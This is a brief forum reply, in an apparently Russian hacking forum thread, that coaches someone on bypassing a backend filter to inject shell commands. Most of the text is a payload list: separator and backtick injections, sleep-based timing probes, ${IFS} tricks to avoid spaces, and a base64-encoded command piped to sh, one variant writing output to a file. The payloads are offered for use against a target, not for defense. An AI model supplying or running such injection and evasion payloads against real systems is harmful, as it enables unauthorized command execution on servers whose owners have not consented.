16.04.2019, 17:08
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами:
5344886
Репутация:
441
|
|
It seems that there are some unknown logic on backend, not traditional WAF. Try to fuzz and detect the white/black sequences and conduct the attack vector in accordance with the circumstances. For example:
Код:
;id;
`id`
;sleep 100;
`sleep 100`
uname${IFS}-a
echo$IFS"bHMgLWxh"|base64$IFS-d|sh
`echo$IFS"bHMgLWxh"|base64$IFS-d|sh>log.txt`
and so on...
Also check this.
|
|
|